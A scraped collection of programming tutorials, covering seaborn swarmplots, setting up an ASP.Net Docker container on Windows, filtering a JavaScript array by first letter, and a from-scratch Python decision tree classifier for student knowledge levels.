"e": 1479, "s": 1471, "text": "Python3" }, { "code": "import seaborn seaborn.set(style='whitegrid')fmri = seaborn.load_dataset(\"fmri\") seaborn.swarmplot(x=\"timepoint\", y=\"signal\", hue=\"region\", data=fmri)", "e": 1682, "s": 1479, "text": null }, { "code": null, "e": 1690, "s": 1682, "text": "Output:" }, { "code": null, "e": 1757, "s": 1690, "text": "Example 3: Basic visualization of “tips” dataset using swarmplot()" }, { "code": null, "e": 1765, "s": 1757, "text": "Python3" }, { "code": "import seaborn seaborn.set(style='whitegrid')tip = seaborn.load_dataset('tips') seaborn.swarmplot(x='day', y='tip', data=tip)", "e": 1892, "s": 1765, "text": null }, { "code": null, "e": 1900, "s": 1892, "text": "Output:" }, { "code": null, "e": 1960, "s": 1900, "text": "1. Draw a single horizontal swarm plot using only one axis:" }, { "code": null, "e": 2100, "s": 1960, "text": "If we use only one data variable instead of two data variables then it means that the axis denotes each of these data variables as an axis." }, { "code": null, "e": 2143, "s": 2100, "text": "X denotes an x-axis and y denote a y-axis." 
}, { "code": null, "e": 2152, "s": 2143, "text": "Syntax: " }, { "code": null, "e": 2174, "s": 2152, "text": "seaborn.swarmplot(x)\n" }, { "code": null, "e": 2182, "s": 2174, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x=tips[\"total_bill\"])", "e": 2477, "s": 2182, "text": null }, { "code": null, "e": 2485, "s": 2477, "text": "Output:" }, { "code": null, "e": 2512, "s": 2485, "text": "2. Draw horizontal swarms:" }, { "code": null, "e": 2684, "s": 2512, "text": "In the above example we see how to plot single horizontal swarm plot and here can perform multiple horizontal swarm plot with exchange the data variable with another axis." }, { "code": null, "e": 2692, "s": 2684, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x=\"total_bill\", y=\"day\", data=tips)", "e": 3001, "s": 2692, "text": null }, { "code": null, "e": 3009, "s": 3001, "text": "Output:" }, { "code": null, "e": 3033, "s": 3009, "text": "3. Using hue parameter:" }, { "code": null, "e": 3178, "s": 3033, "text": "While the points are plotted in two dimensions, another dimension can be added to the plot by coloring the points according to a third variable." }, { "code": null, "e": 3186, "s": 3178, "text": "Syntax:" }, { "code": null, "e": 3218, "s": 3186, "text": "sns.swarmplot(x, y, hue, data);" }, { "code": null, "e": 3226, "s": 3218, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x=\"day\", y=\"total_bill\", hue=\"time\", data=tips)", "e": 3547, "s": 3226, "text": null }, { "code": null, "e": 3555, "s": 3547, "text": "Output:" }, { "code": null, "e": 3612, "s": 3555, "text": "4. Draw outlines around the data points using linewidth:" }, { "code": null, "e": 3746, "s": 3612, "text": "Width of the gray lines that frame the plot elements. Whenever we increase linewidth than the point also will increase automatically." 
}, { "code": null, "e": 3754, "s": 3746, "text": "Syntax:" }, { "code": null, "e": 3795, "s": 3754, "text": "seaborn.swarmplot(x, y, data, linewidth)" }, { "code": null, "e": 3803, "s": 3795, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x=\"day\", y=\"total_bill\", data=tips, linewidth=2)", "e": 4143, "s": 3803, "text": null }, { "code": null, "e": 4151, "s": 4143, "text": "Output:" }, { "code": null, "e": 4191, "s": 4151, "text": "We can change the color with edgecolor:" }, { "code": null, "e": 4199, "s": 4191, "text": "Python3" }, { "code": "seaborn.swarmplot(y=\"total_bill\", x=\"day\", data=tips, linewidth=2,edgecolor='green')", "e": 4302, "s": 4199, "text": null }, { "code": null, "e": 4310, "s": 4302, "text": "Output:" }, { "code": null, "e": 4403, "s": 4310, "text": "5. Draw each level of the hue variable at different locations on the major categorical axis:" }, { "code": null, "e": 4599, "s": 4403, "text": "When using hue nesting, setting dodge should be True will separate the point for different hue levels along the categorical axis. And Palette is used for the different levels of the hue variable." }, { "code": null, "e": 4607, "s": 4599, "text": "Syntax:" }, { "code": null, "e": 4658, "s": 4607, "text": "seaborn.stripplot(x, y, data, hue, palette, dodge)" }, { "code": null, "e": 4666, "s": 4658, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x=\"day\", y=\"total_bill\", hue=\"smoker\", data=tips, palette=\"Set2\", dodge=True)", "e": 5035, "s": 4666, "text": null }, { "code": null, "e": 5043, "s": 5035, "text": "Output:" }, { "code": null, "e": 5075, "s": 5043, "text": "Possible values of palette are:" }, { "code": null, "e": 5185, "s": 5075, "text": "Accent, Accent_r, Blues, Blues_r, BrBG, BrBG_r, BuGn, BuGn_r, BuPu, BuPu_r, CMRmap, CMRmap_r, Dark2, Dark2_r," }, { "code": null, "e": 5299, "s": 5185, "text": "GnBu, GnBu_r, Greens, Greens_r, Greys, Greys_r, OrRd, OrRd_r, Oranges, Oranges_r, PRGn, PRGn_r, Paired, Paired_r," }, { "code": null, "e": 5413, "s": 5299, "text": "Pastel1, Pastel1_r, Pastel2, Pastel2_r, PiYG, PiYG_r, PuBu, PuBuGn, PuBuGn_r, PuBu_r, PuOr, PuOr_r, PuRd, PuRd_r," }, { "code": null, "e": 5531, "s": 5413, "text": "Purples, Purples_r, RdBu, RdBu_r, RdGy, RdGy_r, RdPu, RdPu_r, RdYlBu, RdYlBu_r, RdYlGn, RdYlGn_r, Reds, Reds_r, Set1," }, { "code": null, "e": 5647, "s": 5531, "text": "Set1_r, Set2, Set2_r, Set3, Set3_r, Spectral, Spectral_r, Wistia, Wistia_r, YlGn, YlGnBu, YlGnBu_r, YlGn_r, YlOrBr," }, { "code": null, "e": 5767, "s": 5647, "text": "YlOrBr_r, YlOrRd, YlOrRd_r, afmhot, afmhot_r, autumn, autumn_r, binary, binary_r, bone, bone_r, brg, brg_r, bwr, bwr_r," }, { "code": null, "e": 5891, "s": 5767, "text": "cividis, cividis_r, cool, cool_r, coolwarm, coolwarm_r, copper, copper_r, cubehelix, cubehelix_r, flag, flag_r, gist_earth," }, { "code": null, "e": 6020, "s": 5891, "text": "gist_earth_r, gist_gray, gist_gray_r, gist_heat, gist_heat_r, gist_ncar, gist_ncar_r, gist_rainbow, gist_rainbow_r, gist_stern, " }, { "code": null, "e": 6103, "s": 
6020, "text": "6. Plotting large points and different aesthetics With marker and alpha parameter:" }, { "code": null, "e": 6219, "s": 6103, "text": "We will use alpha to manage transparency of the data point, and use marker for marker to customize the data point. " }, { "code": null, "e": 6227, "s": 6219, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x=\"day\", y=\"total_bill\", hue=\"smoker\", data=tips, palette=\"Set2\", size=20, marker=\"D\", edgecolor=\"gray\", alpha=.25)", "e": 6652, "s": 6227, "text": null }, { "code": null, "e": 6660, "s": 6652, "text": "Output:" }, { "code": null, "e": 6713, "s": 6660, "text": "7. Control swarm order by passing an explicit order:" }, { "code": null, "e": 6721, "s": 6713, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x=\"time\", y=\"tip\", data=tips, order=[\"Dinner\", \"Lunch\"])", "e": 7069, "s": 6721, "text": null }, { "code": null, "e": 7077, "s": 7069, "text": "Output:" }, { "code": null, "e": 7104, "s": 7077, "text": "8. Adding size attributes." }, { "code": null, "e": 7189, "s": 7104, "text": "Using size we can generate the point and we can produce points with different sizes." }, { "code": null, "e": 7197, "s": 7189, "text": "Syntax:" }, { "code": null, "e": 7234, "s": 7197, "text": "seaborn.swramplot( x, y, data, size)" }, { "code": null, "e": 7242, "s": 7234, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x='day', y='total_bill', data=tips, hue='smoker', size=10)", "e": 7590, "s": 7242, "text": null }, { "code": null, "e": 7598, "s": 7590, "text": "Output:" }, { "code": null, "e": 7632, "s": 7598, "text": "9. Adding the palette attributes:" }, { "code": null, "e": 7824, "s": 7632, "text": "Using the palette we can generate the point with different colors. In this below example we can see the palette can be responsible for a generate the swramplot with different colormap values." }, { "code": null, "e": 7832, "s": 7824, "text": "Syntax:" }, { "code": null, "e": 7885, "s": 7832, "text": "seaborn.swramplot( x, y, data, palette=”color_name”)" }, { "code": null, "e": 7893, "s": 7885, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x='day', y='total_bill', data=tips, hue='time', palette='pastel')", "e": 8248, "s": 7893, "text": null }, { "code": null, "e": 8256, "s": 8248, "text": "Output:" }, { "code": null, "e": 8269, "s": 8256, "text": "kumar_satyam" }, { "code": null, "e": 8284, "s": 8269, "text": "Python-Seaborn" }, { "code": null, "e": 8291, "s": 8284, "text": "Python" } ]
Docker - Setting ASP.Net
ASP.Net is the standard web development framework that is provided by Microsoft for developing server-side applications. Since ASP.Net has been around for quite a long time for development, Docker has ensured that it has support for ASP.Net.

In this chapter, we will see the various steps for getting the Docker container for ASP.Net up and running.

The following steps need to be carried out first for running ASP.Net.

Step 1 − Since this can only run on Windows systems, you first need to ensure that you have either Windows 10 or Windows Server 2016.

Step 2 − Next, ensure that Hyper-V and Containers are installed on the Windows system. To install Hyper-V and Containers, you can go to Turn Windows Features ON or OFF. Then ensure the Hyper-V option and Containers are checked and click the OK button.

The system might require a restart after this operation.

Step 3 − Next, you need to use the following PowerShell command to install the 1.13.0rc4 version of Docker. The following command will download it and store it in the temp location.

Invoke-WebRequest "https://test.docker.com/builds/Windows/x86_64/docker-1.13.0-rc4.zip" -OutFile "$env:TEMP\docker-1.13.0-rc4.zip" -UseBasicParsing

Step 4 − Next, you need to expand the archive using the following PowerShell command.

Expand-Archive -Path "$env:TEMP\docker-1.13.0-rc4.zip" -DestinationPath $env:ProgramFiles

Step 5 − Next, you need to add the Docker files to the environment variable using the following PowerShell command.

$env:path += ";$env:ProgramFiles\Docker"

Step 6 − Next, you need to register the Docker daemon service using the following PowerShell command.

dockerd --register-service

Step 7 − Finally, you can start the Docker daemon using the following command.

Start-Service Docker

Use the docker version command in PowerShell to verify that the Docker daemon is working.

Let's see how to install the ASP.Net container.

Step 1 − The first step is to pull the image from Docker Hub. When you log into Docker Hub, you will be able to search and see the image for Microsoft/aspnet as shown below. Just type in asp in the search box and click on the Microsoft/aspnet link which comes up in the search results.

Step 2 − You will see the Docker pull command for ASP.Net in the details of the repository in Docker Hub.

Step 3 − Go to the Docker Host and run the Docker pull command for the microsoft/aspnet image. Note that the image is pretty large, somewhere close to 4.2 GB.

Step 4 − Now go to the following location https://github.com/Microsoft/aspnet-docker and download the entire Git repository.

Step 5 − Create a folder called App in your C drive. Then copy the contents from the 4.6.2/sample folder to your C drive. Go to the Docker File in the sample directory and issue the following command −

docker build -t aspnet-site-new --build-arg site_root=/

The following points need to be noted about the above command −

It builds a new image called aspnet-site-new from the Docker File.

The root path is set to the localpath folder.

Step 6 − Now it's time to run the container. It can be done using the following command −

docker run -d -p 8000:80 --name my-running-site-new aspnet-site-new

Step 7 − You will now have IIS running in the Docker container. To find the IP Address of the Docker container, you can issue the Docker inspect command as shown below.
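The exact invocation depends on the container's network. As a hedged sketch, assuming the default Windows container network named nat and the container name used above −

docker inspect -f "{{ .NetworkSettings.Networks.nat.IPAddress }}" my-running-site-new

Running docker inspect without a format string dumps the full JSON description of the container, from which the IP Address can also be read manually.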
[ { "code": null, "e": 2582, "s": 2340, "text": "ASP.Net is the standard web development framework that is provided by Microsoft for developing server-side applications. Since ASP.Net has been around for quite a long time for development, Docker has ensured that it has support for ASP.Net." }, { "code": null, "e": 2690, "s": 2582, "text": "In this chapter, we will see the various steps for getting the Docker container for ASP.Net up and running." }, { "code": null, "e": 2760, "s": 2690, "text": "The following steps need to be carried out first for running ASP.Net." }, { "code": null, "e": 2893, "s": 2760, "text": "Step 1 − Since this can only run on Windows systems, you first need to ensure that you have either Windows 10 or Window Server 2016." }, { "code": null, "e": 3147, "s": 2893, "text": "Step 2 − Next, ensure that Hyper-V is and Containers are installed on the Windows system. To install Hyper–V and Containers, you can go to Turn Windows Features ON or OFF. Then ensure the Hyper-V option and Containers is checked and click the OK button." }, { "code": null, "e": 3204, "s": 3147, "text": "The system might require a restart after this operation." }, { "code": null, "e": 3388, "s": 3204, "text": "Step 3 − Next, you need to use the following Powershell command to install the 1.13.0rc4 version of Docker. The following command will download this and store it in the temp location." }, { "code": null, "e": 3542, "s": 3388, "text": "Invoke-WebRequest \"https://test.docker.com/builds/Windows/x86_64/docker-1.13.0-\n rc4.zip\" -OutFile \"$env:TEMP\\docker-1.13.0-rc4.zip\" –UseBasicParsing \n" }, { "code": null, "e": 3628, "s": 3542, "text": "Step 4 − Next, you need to expand the archive using the following powershell command." }, { "code": null, "e": 3719, "s": 3628, "text": "Expand-Archive -Path \"$env:TEMP\\docker-1.13.0-rc4.zip\" -DestinationPath $env:ProgramFiles\n" }, { "code": null, "e": 3835, "s": 3719, "text": "Step 5 − Next, you need to add the Docker Files to the environment variable using the following powershell command." }, { "code": null, "e": 3878, "s": 3835, "text": "$env:path += \";$env:ProgramFiles\\Docker\" \n" }, { "code": null, "e": 3980, "s": 3878, "text": "Step 6 − Next, you need to register the Docker Daemon Service using the following powershell command." }, { "code": null, "e": 4009, "s": 3980, "text": "dockerd --register-service \n" }, { "code": null, "e": 4088, "s": 4009, "text": "Step 7 − Finally, you can start the docker daemon using the following command." }, { "code": null, "e": 4110, "s": 4088, "text": "Start-Service Docker\n" }, { "code": null, "e": 4199, "s": 4110, "text": "Use the docker version command in powershell to verify that the docker daemon is working" }, { "code": null, "e": 4247, "s": 4199, "text": "Let’s see how to install the ASP.Net container." }, { "code": null, "e": 4533, "s": 4247, "text": "Step 1 − The first step is to pull the image from Docker Hub. When you log into Docker Hub, you will be able to search and see the image for Microsoft/aspnet as shown below. Just type in asp in the search box and click on the Microsoft/aspnet link which comes up in the search results." }, { "code": null, "e": 4644, "s": 4533, "text": "Step 2 − You will see that the Docker pull command for ASP.Net in the details of the repository in Docker Hub." }, { "code": null, "e": 4799, "s": 4644, "text": "Step 3 − Go to Docker Host and run the Docker pull command for the microsoft/aspnet image. Note that the image is pretty large, somewhere close to 4.2 GB." 
}, { "code": null, "e": 4924, "s": 4799, "text": "Step 4 − Now go to the following location https://github.com/Microsoft/aspnet-docker and download the entire Git repository." }, { "code": null, "e": 5123, "s": 4924, "text": "Step 5 − Create a folder called App in your C drive. Then copy the contents from the 4.6.2/sample folder to your C drive. Go the Docker File in the sample directory and issue the following command −" }, { "code": null, "e": 5180, "s": 5123, "text": "docker build –t aspnet-site-new –build-arg site_root=/ \n" }, { "code": null, "e": 5244, "s": 5180, "text": "The following points need to be noted about the above command −" }, { "code": null, "e": 5311, "s": 5244, "text": "It builds a new image called aspnet-site-new from the Docker File." }, { "code": null, "e": 5357, "s": 5311, "text": "The root path is set to the localpath folder." }, { "code": null, "e": 5447, "s": 5357, "text": "Step 6 − Now it’s time to run the container. It can be done using the following command −" }, { "code": null, "e": 5516, "s": 5447, "text": "docker run –d –p 8000:80 –name my-running-site-new aspnet-site-new \n" }, { "code": null, "e": 5685, "s": 5516, "text": "Step 7 − You will now have IIS running in the Docker container. To find the IP Address of the Docker container, you can issue the Docker inspect command as shown below." }, { "code": null, "e": 5719, "s": 5685, "text": "\n 70 Lectures \n 12 hours \n" }, { "code": null, "e": 5735, "s": 5719, "text": " Anshul Chauhan" }, { "code": null, "e": 5768, "s": 5735, "text": "\n 41 Lectures \n 5 hours \n" }, { "code": null, "e": 5780, "s": 5768, "text": " AR Shankar" }, { "code": null, "e": 5813, "s": 5780, "text": "\n 31 Lectures \n 3 hours \n" }, { "code": null, "e": 5830, "s": 5813, "text": " Abhilash Nelson" }, { "code": null, "e": 5863, "s": 5830, "text": "\n 15 Lectures \n 2 hours \n" }, { "code": null, "e": 5903, "s": 5863, "text": " Harshit Srivastava, Pranjal Srivastava" }, { "code": null, "e": 5936, "s": 5903, "text": "\n 33 Lectures \n 4 hours \n" }, { "code": null, "e": 5956, "s": 5936, "text": " Mumshad Mannambeth" }, { "code": null, "e": 5988, "s": 5956, "text": "\n 13 Lectures \n 53 mins\n" }, { "code": null, "e": 6004, "s": 5988, "text": " Musab Zayadneh" }, { "code": null, "e": 6011, "s": 6004, "text": " Print" }, { "code": null, "e": 6022, "s": 6011, "text": " Add Notes" } ]
Array filtering using first string letter in JavaScript
Suppose we have an array that contains the names of some people like this:

const arr = ['Amy','Dolly','Jason','Madison','Patricia'];

We are required to write a JavaScript function that takes in one such array as the first argument, and two lowercase alphabet characters as second and third argument. Then, our function should filter the array to contain only those elements that start with the alphabets that fall within the range specified by the second and third argument.

Therefore, if the second and third argument are 'a' and 'j' respectively, then the output should be −

const output = ['Amy','Dolly','Jason'];

Let us write the code −

const arr = ['Amy','Dolly','Jason','Madison','Patricia'];
const filterByAlphaRange = (arr = [], start = 'a', end = 'z') => {
   const isGreater = (c1, c2) => c1 >= c2;
   const isSmaller = (c1, c2) => c1 <= c2;
   const filtered = arr.filter(el => {
      const [firstChar] = el.toLowerCase();
      return isGreater(firstChar, start) && isSmaller(firstChar, end);
   });
   return filtered;
};
console.log(filterByAlphaRange(arr, 'a', 'j'));

And the output in the console will be −

[ 'Amy', 'Dolly', 'Jason' ]
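As a quick additional sanity check (this extra call is illustrative and not part of the original problem statement), we can call the same function with a different range −

// names starting with letters from 'm' through 'z'
console.log(filterByAlphaRange(arr, 'm', 'z'));

which logs −

[ 'Madison', 'Patricia' ]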
[ { "code": null, "e": 1132, "s": 1062, "text": "Suppose we have an array that contains name of some people like this:" }, { "code": null, "e": 1190, "s": 1132, "text": "const arr = ['Amy','Dolly','Jason','Madison','Patricia'];" }, { "code": null, "e": 1533, "s": 1190, "text": "We are required to write a JavaScript function that takes in one such string as the first argument, and two lowercase alphabet characters as second and third argument. Then, our function should filter the array to contain only those elements that start with the alphabets that fall within the range specified by the second and third argument." }, { "code": null, "e": 1635, "s": 1533, "text": "Therefore, if the second and third argument are 'a' and 'j' respectively, then the output should be −" }, { "code": null, "e": 1675, "s": 1635, "text": "const output = ['Amy','Dolly','Jason'];" }, { "code": null, "e": 1699, "s": 1675, "text": "Let us write the code −" }, { "code": null, "e": 2142, "s": 1699, "text": "const arr = ['Amy','Dolly','Jason','Madison','Patricia'];\nconst filterByAlphaRange = (arr = [], start = 'a', end = 'z') => {\n const isGreater = (c1, c2) => c1 >= c2;\n const isSmaller = (c1, c2) => c1 <= c2;\n const filtered = arr.filter(el => {\n const [firstChar] = el.toLowerCase();\n return isGreater(firstChar, start) && isSmaller(firstChar, end);\n });\n return filtered;\n};\nconsole.log(filterByAlphaRange(arr, 'a', 'j'));" }, { "code": null, "e": 2182, "s": 2142, "text": "And the output in the console will be −" }, { "code": null, "e": 2210, "s": 2182, "text": "[ 'Amy', 'Dolly', 'Jason' ]" } ]
Decision Tree Classifier from Scratch: Classifying Student’s Knowledge Level | by Anish Shrestha | Towards Data Science
You need to have basic knowledge in:

Python programming language
Numpy (Library for scientific computing)
Pandas

The data set I am going to use in this project has been sourced from the Machine Learning Repository of the University of California, Irvine User Knowledge Modeling Data Set (UC Irvine). The UCI page mentions the following publication as the original source of the data set:

H. T. Kahraman, Sagiroglu, S., Colak, I., Developing intuitive knowledge classifier and modeling of users’ domain dependent data in web, Knowledge Based Systems, vol. 37, pp. 283–295, 2013

In simple words, a Decision Tree Classifier is a supervised machine learning algorithm that is used for classification problems. Under the hood in the decision tree, each node asks a True or False question about one of the features and moves left or right with respect to the decision.

You can learn more about Decision Tree from here.

We are going to use Machine Learning algorithms to find the patterns in the historical data of the students and classify their knowledge level, and for that, we are going to write our own simple Decision Tree Classifier from scratch by using Python Programming Language.

Though I am going to explain everything along the way, it will not be a basic level explanation. I will highlight the important concepts with further links so that everyone can explore more on those topics.

We are going to use pandas for data processing and data cleaning.

import pandas as pd

df = pd.read_csv('data.csv')
df.head()

First off, we are importing the data.csv file, then processing it as a pandas data frame and taking a peek at the data.

As we can see, our data has 6 columns. It contains 5 features and 1 label. Since this data is already cleaned, there is no need for data cleaning and wrangling. But while working with other real-world datasets it is important to check for null values and outliers in the dataset and engineer the best features out of it.

train = df.values[:-20]
test = df.values[-20:]

here we split our data into train and test, where the last 20 rows of our dataset are test data and the rest are train data.

Now it’s time to write our Decision Tree Classifier.

But before diving into code there are a few things to learn:

To build the tree we are using a Decision Tree learning algorithm called CART. There are other learning algorithms like ID3, C4.5, C5.0, etc. You can learn more about them from here.

CART stands for Classification and Regression Trees.
CART uses Gini impurity as its metric to quantify how much a question helps to unmix the data or, in simple words, CART uses Gini as its cost function to evaluate the error.

Under the hood, all the learning algorithms give us a procedure to decide which question to ask and when.

To check how correctly the question helped us to unmix the data we use Information Gain. It helps us to reduce the uncertainty, and we use this to select the best question to ask; given that question, we recursively build tree nodes. We then further continue dividing the nodes until there are no questions to ask, and we denote that last node as a leaf.

To implement the Decision Tree Classifier we need to know what question to ask about the data and when. Let's write the code for that:

class CreateQuestion:
    def __init__(self, column, value):
        self.column = column
        self.value = value

    def check(self, data):
        # compare the feature value of the row against
        # the value stored in the question
        val = data[self.column]
        return val >= self.value

    def __repr__(self):
        return "Is column %s %s %s?" % (
            self.column, ">=", str(self.value))

Above we’ve written a CreateQuestion class that takes 2 inputs: a column number and a value, stored as instance variables. It has a check method which is used to compare the feature value. __repr__ is just one of Python's magic methods that helps display the question.

Let's see it in action:

q = CreateQuestion(0, 0.08)

now let's check if our check method is working fine or not:

data = train[0]
q.check(data)

as we can see we’ve got a False value. Since our 0th value in the train set is 0.0, which is not greater than or equal to 0.08, our method is working fine.

Now it’s time to create a partition function that helps us to partition our data into two subsets: the first set contains all the data which is True, and the second contains False.

Let's write the code for this:

def partition(rows, qsn):
    true_rows, false_rows = [], []
    for row in rows:
        if qsn.check(row):
            true_rows.append(row)
        else:
            false_rows.append(row)
    return true_rows, false_rows

our partition function takes two inputs: rows and a question, then returns a list of true rows and a list of false rows.

Let's see this in action as well:

true_rows, false_rows = partition(train, CreateQuestion(0, 0.08))

here true_rows contains all the data greater than or equal to 0.08 and false_rows contains data less than 0.08.

Now it’s time to write our Gini Impurity algorithm. As we’ve discussed earlier, it helps us to quantify how much uncertainty there is in the node, and Information Gain lets us quantify how much a question reduces that uncertainty.

Impurity metrics range between 0 and 1, where a lower value indicates less uncertainty.

def gini(rows):
    counts = class_counts(rows)
    impurity = 1
    for label in counts:
        probab_of_label = counts[label] / float(len(rows))
        impurity -= probab_of_label**2
    return impurity

In our gini function, we have just implemented the formula for Gini. It returns the impurity value of the given rows. The counts variable holds a dictionary with the total count of each label in the dataset. class_counts is a helper function that counts how many rows of each class are present in a dataset.

def class_counts(rows):
    counts = {}
    for row in rows:
        label = row[-1]
        if label not in counts:
            counts[label] = 0
        counts[label] += 1
    return counts

Let's see gini in action: as you can see in image 1 there is some impurity, so it returns 0.5, and in image 2 there are no impurities, so it returns 0.
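The same two calls can be reproduced with a small sketch on made-up toy rows (the rows below are purely illustrative; only the last element of each row is read as the label):

# a mixed set of labels gives maximum impurity for two classes
mixed_rows = [['item1', 'High'], ['item2', 'Low']]
print(gini(mixed_rows))   # 0.5

# a pure set of labels gives zero impurity
pure_rows = [['item1', 'High'], ['item2', 'High']]
print(gini(pure_rows))    # 0.0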
Now we are going to write code for calculating information gain:

def info_gain(left, right, current_uncertainty):
    p = float(len(left)) / (len(left) + len(right))
    return current_uncertainty - p * gini(left) \
        - (1 - p) * gini(right)

Information gain is calculated by subtracting the weighted impurity of the two child nodes from the uncertainty of the starting node.

Now it's time to put everything together.

def find_best_split(rows):
    best_gain = 0
    best_question = None
    current_uncertainty = gini(rows)
    n_features = len(rows[0]) - 1

    for col in range(n_features):
        values = set([row[col] for row in rows])
        for val in values:
            question = CreateQuestion(col, val)
            true_rows, false_rows = partition(rows, question)

            if len(true_rows) == 0 or len(false_rows) == 0:
                continue

            gain = info_gain(true_rows, false_rows,
                             current_uncertainty)
            if gain > best_gain:
                best_gain, best_question = gain, question

    return best_gain, best_question

We have written a find_best_split function which finds the best question by iterating over every feature and value, calculating the information gain for each candidate split.

Let's see this function in action:

best_gain, best_question = find_best_split(train)

We are now going to write our fit function.

def fit(rows):
    gain, question = find_best_split(rows)

    if gain == 0:
        return Leaf(rows)

    true_rows, false_rows = partition(rows, question)

    # Recursively build the true branch.
    true_branch = fit(true_rows)

    # Recursively build the false branch.
    false_branch = fit(false_rows)

    return Decision_Node(question, true_branch, false_branch)

Our fit function basically builds the tree for us. It starts with the root node, finding the best question to ask for that node by using our find_best_split function. It iterates over each value, then splits the data, and the information gain is calculated. Along the way, it keeps track of the question which produces the most gain.

After that, if there is still a useful question to ask, the gain will be greater than 0, so the rows are sub-grouped into branches and it recursively builds the true branch first, until there are no further questions to ask and the gain is 0.

That node then becomes a Leaf node.

code for our Leaf class looks like this:

class Leaf:
    def __init__(self, rows):
        self.predictions = class_counts(rows)

It holds a dictionary of classes (“High”, “Low”) and the number of times each appears in the rows from the data that reached the current leaf.

for the false branch also the same process is applied. After that, it becomes a Decision_Node.

Code for our Decision_Node class looks like this:

class Decision_Node:
    def __init__(self, question,
                 true_branch, false_branch):
        self.question = question
        self.true_branch = true_branch
        self.false_branch = false_branch

This class just holds a reference to the question we’ve asked and the two child nodes that result.

now we return to the root node and build the false branch. Since there will not be any question to ask, it becomes a Leaf node and the root node also becomes a Decision_Node.

Let's see the fit function in action:

_tree = fit(train)

to print the _tree we have to write a special function.
def print_tree(node, spacing=""):
    # Base case: we've reached a leaf
    if isinstance(node, Leaf):
        print(spacing + "Predict", node.predictions)
        return

    # Print the question at this node
    print(spacing + str(node.question))

    # Call this function recursively on the true branch
    print(spacing + '--> True:')
    print_tree(node.true_branch, spacing + " ")

    # Call this function recursively on the false branch
    print(spacing + '--> False:')
    print_tree(node.false_branch, spacing + " ")

this print_tree function helps us to visualize our tree in an awesome way.

We have just finished building our Decision Tree Classifier!

To understand and see what we’ve built, let's write some more helper functions:

def classify(row, node):
    if isinstance(node, Leaf):
        return node.predictions

    if node.question.check(row):
        return classify(row, node.true_branch)
    else:
        return classify(row, node.false_branch)

The classify function helps us to check the confidence for a given row and a tree.

classify(train[5], _tree)

as you can see above, our tree has classified the given value as Middle (96 being the number of training rows of that class that reached the leaf).

def print_leaf(counts):
    total = sum(counts.values()) * 1.0
    probs = {}
    for lbl in counts.keys():
        probs[lbl] = str(int(counts[lbl] / total * 100)) + "%"
    return probs

The print_leaf function helps us to prettify our prediction.

We have successfully built, visualized, and seen our tree in action.

Now let's perform a simple model evaluation:

for row in test:
    print("Actual level: %s. Predicted level: %s"
          % (row[-1], print_leaf(classify(row, _tree))))

As you can see, our tree nicely predicted our test data, which was isolated from the train data.

Decision Tree Classifier is an awesome algorithm to learn. It is beginner-friendly and easy to implement as well. We have built a very simple Decision Tree Classifier from scratch, without using any abstract libraries, to predict the students' knowledge level. By just swapping the dataset and tweaking a few functions, you can use this algorithm for other classification purposes as well.

[1] H. T. Kahraman, Sagiroglu, S., Colak, I., Developing intuitive knowledge classifier and modeling of users’ domain-dependent data in web, Knowledge-Based Systems, vol. 37, pp. 283–295, 2013

[2] Aurelien Geron, Hands-on Machine Learning with Scikit-Learn, Keras & TensorFlow, O’REILLY, 2nd Edition, 2019
[ { "code": null, "e": 209, "s": 172, "text": "You need to have basic knowledge in:" }, { "code": null, "e": 283, "s": 209, "text": "Python programming languageNumpy (Library for scientific computing)Pandas" }, { "code": null, "e": 311, "s": 283, "text": "Python programming language" }, { "code": null, "e": 352, "s": 311, "text": "Numpy (Library for scientific computing)" }, { "code": null, "e": 359, "s": 352, "text": "Pandas" }, { "code": null, "e": 634, "s": 359, "text": "The data set I am going to use in this project has been sourced from the Machine Learning Repository of the University of California, Irvine User Knowledge Modeling Data Set (UC Irvine). The UCI page mentions the following publication as the original source of the data set:" }, { "code": null, "e": 823, "s": 634, "text": "H. T. Kahraman, Sagiroglu, S., Colak, I., Developing intuitive knowledge classifier and modeling of users’ domain dependent data in web, Knowledge Based Systems, vol. 37, pp. 283–295, 2013" }, { "code": null, "e": 1122, "s": 823, "text": "In simple words, a Decision Tree Classifier is a Supervised Machine learning algorithm that is used for supervised + classification problems. Under the hood in the decision tree, each node asks a True or False question about one of the features and moves left or right with respect to the decision." }, { "code": null, "e": 1172, "s": 1122, "text": "You can learn more about Decision Tree from here." }, { "code": null, "e": 1443, "s": 1172, "text": "We are going to use Machine Learning algorithms to find the patterns on the historical data of the students and classify their 